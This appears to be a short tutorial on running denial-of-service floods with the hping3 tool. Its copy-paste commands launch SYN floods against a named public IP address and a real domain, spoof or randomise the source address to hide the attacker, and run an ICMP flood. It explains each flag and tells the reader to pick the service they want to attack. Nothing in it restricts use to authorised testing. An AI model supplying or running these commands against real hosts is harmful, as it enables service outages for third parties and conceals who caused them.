# HPING3 ATTACK

Install hping3
```
sudo apt install hping3 -y
```

<b>Example command:</b>
```
sudo hping3 -S --flood -V -p 80 170.155.9.185
```
description:
- sudo: gives needed privileges to run hping3.
- hping3: calls hping3 program.
- S: specifies SYN packets.
- flood: replies will be ignored and packets will be sent as fast as possible.
- V: Verbosity.
- p 80: port 80, you can replace this number for the service you want to attack.
170.155.9.185: target IP.

Note that the output does not show replies because they were ignored.

<b>Example command:</b>
```
sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-source
```
description:
- lacampora.org: is the target, this time defined with a domain name.
- q: brief output
- n: shows target IP instead of host.
- d 120: sets packet size
- rand-source: hides IP address.

The following example shows another possible SYN flood test for port 80.

<b>Other Example:</b>

The syntax is the following:
```
sudo hping3 -a <FAKE IP> <target> -S -q -p 80
```
In the example below, I replaced my real IP address with the IP 190.0.174.10.
```
sudo hping3 -a 190.0.174.10 190.0.175.100 -S -q -p 80
```

```
sudo hping3 -1 --flood -a 22.22.22 192.168.2.111
```